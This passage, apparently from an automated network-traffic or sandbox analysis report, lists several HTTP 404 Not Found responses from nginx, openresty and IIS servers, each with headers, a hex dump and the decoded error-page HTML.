70 78 3b 7d 20 0d 0a 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 2e 34 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 7d 0d 0a 68 32 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 37 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 43 43 30 30 30 30 3b 7d 20 0d 0a 68 33 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 32 65 6d 3b 6d 61 72 67 69 6e 3a 31 30 70 78 20 30 20 30 20 30 3b 63 6f 6c 6f 72 3a 23 30 30 30 30 30 30 3b 7d 20 0d 0a 23 68 65 61 64 65 72 7b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 30 3b 70 61 64 64 69 6e 67 3a 36 70 78 20 32 25 20 36 70 78 20 32 25 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 74 72 65 62 75 63 68 65 74 20 4d 53 22 2c 20 56 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 0d 0a 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 35 35 35 35 35 3b 7d 0d 0a 23 63 6f 6e 74 65 6e 74 7b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 32 25 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2e 63 6f 6e 74 65 6e 74 2d 63 6f 6e 74 61 69 6e 65 72 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 46 46 46 3b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 38 70 78 3b 70 61 64 64 69 6e 67 3a 31 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2d 2d 3e 0d 0a 3c 2f 73 74 79 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 64 69 76 20 69 64 3d 22 68 65 61 64 65 72 22 3e 3c 68 31 3e 53 65 72 76
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.0 (Ubuntu)Date: Mon, 11 Nov 2024 17:24:30 GMTContent-Type: text/htmlContent-Length: 580Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.0 (Ubuntu)Date: Mon, 11 Nov 2024 17:24:30 GMTContent-Type: text/htmlContent-Length: 580Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlServer: Microsoft-IIS/7.5X-Powered-By: ASP.NETDate: Mon, 11 Nov 2024 17:24:24 GMTContent-Length: 1245Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 22 2f 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 46 69 6c 65 20 6f 72 20 64 69 72 65 63 74 6f 72 79 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 3c 21 2d 2d 0d 0a 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 37 65 6d 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 56 65 72 64 61 6e 61 2c 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 45 45 45 45 45 45 3b 7d 0d 0a 66 69 65 6c 64 73 65 74 7b 70 61 64 64 69 6e 67 3a 30 20 31 35 70 78 20 31 30 70 78 20 31 35 70 78 3b 7d 20 0d 0a 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 2e 34 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 7d 0d 0a 68 32 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 37 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 43 43 30 30 30 30 3b 7d 20 0d 0a 68 33 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 32 65 6d 3b 6d 61 72 67 69 6e 3a 31 30 70 78 20 30 20 30 20 30 3b 63 6f 6c 6f 72 3a 23 30 30 30 30 30 30 3b 7d 20 0d 0a 23 68 65 61 64 65 72 7b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 30 3b 70 61 64 64 69 6e 67 3a 36 70 78 20 32 25 20 36 70 78 20 32 25 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 74 72 65 62 75 63 68 65 74 20 4d 53 22 2c 20 56 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 0d 0a 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 35 35 35 35 35 3b 7d 0d 0a 23 63 6f 6e 74 65 6e 74 7b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 32 25 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2e 63 6f 6e 74 65 6e 74 2d 63 6f 6e 74 61 69 6e 65 72 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 46 46 46 3b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 38 70 78 3b 70 61 64 64 69 6e 67 3a 31 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2d 2d 3e 0d 0a 3c 2f 73 74 79 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 64 69 76 20 69 64 3d 22 68 65 61 64 65 72 22 3e 3c 68 31 3e 53 65 72 76
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 11 Nov 2024 17:24:31 GMTContent-Type: text/htmlContent-Length: 548Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 11 Nov 2024 17:24:31 GMTContent-Type: text/htmlContent-Length: 548Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: openresty/1.21.4.3Date: Mon, 11 Nov 2024 17:25:12 GMTContent-Type: text/htmlContent-Length: 561Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 2f 31 2e 32 31 2e 34 2e 33 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>openresty/1.21.4.3</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: openresty/1.21.4.3Date: Mon, 11 Nov 2024 17:25:12 GMTContent-Type: text/htmlContent-Length: 561Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 2f 31 2e 32 31 2e 34 2e 33 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>openresty/1.21.4.3</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 11 Nov 2024 17:25:18 GMTContent-Type: text/htmlContent-Length: 138Connection: keep-aliveETag: "663ee226-8a"Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 11 Nov 2024 17:25:18 GMTContent-Type: text/htmlContent-Length: 138Connection: keep-aliveETag: "663ee226-8a"Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlServer: Microsoft-IIS/7.5X-Powered-By: ASP.NETDate: Mon, 11 Nov 2024 17:25:24 GMTContent-Length: 1245Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 